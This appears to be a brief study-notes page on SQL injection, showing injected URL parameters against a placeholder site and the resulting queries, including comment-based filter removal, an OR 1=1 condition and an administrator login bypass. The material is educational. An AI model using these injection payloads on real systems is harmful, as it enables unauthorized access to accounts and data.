SECURITY

  minte9
REMEMBERS




Last update:   10-05-2022

Interfere

An attacker may interfere with the queries.
 
# Use comment to remove the remainder of the query

https://insecure-website.com/products?category=Gifts
# SELECT * FROM products WHERE category = 'Gifts' AND released = 1

https://insecure-website.com/products?category=Gifts'--
# SELECT * FROM products WHERE category = 'Gifts'--' AND released = 1

https://insecure-website.com/products?category=Gifts'+OR+1=1--
# SELECT * FROM products WHERE category = 'Gifts' OR 1=1--' AND released = 1

Bypass

An attacker can log in as any user without a password.
 
# SELECT * FROM users WHERE username = 'wiener' AND password = 'bluecheese'
# SELECT * FROM users WHERE username = 'administrator'--' AND password = ''

Questions    
Host header
        A B C D E F
🔔
1/1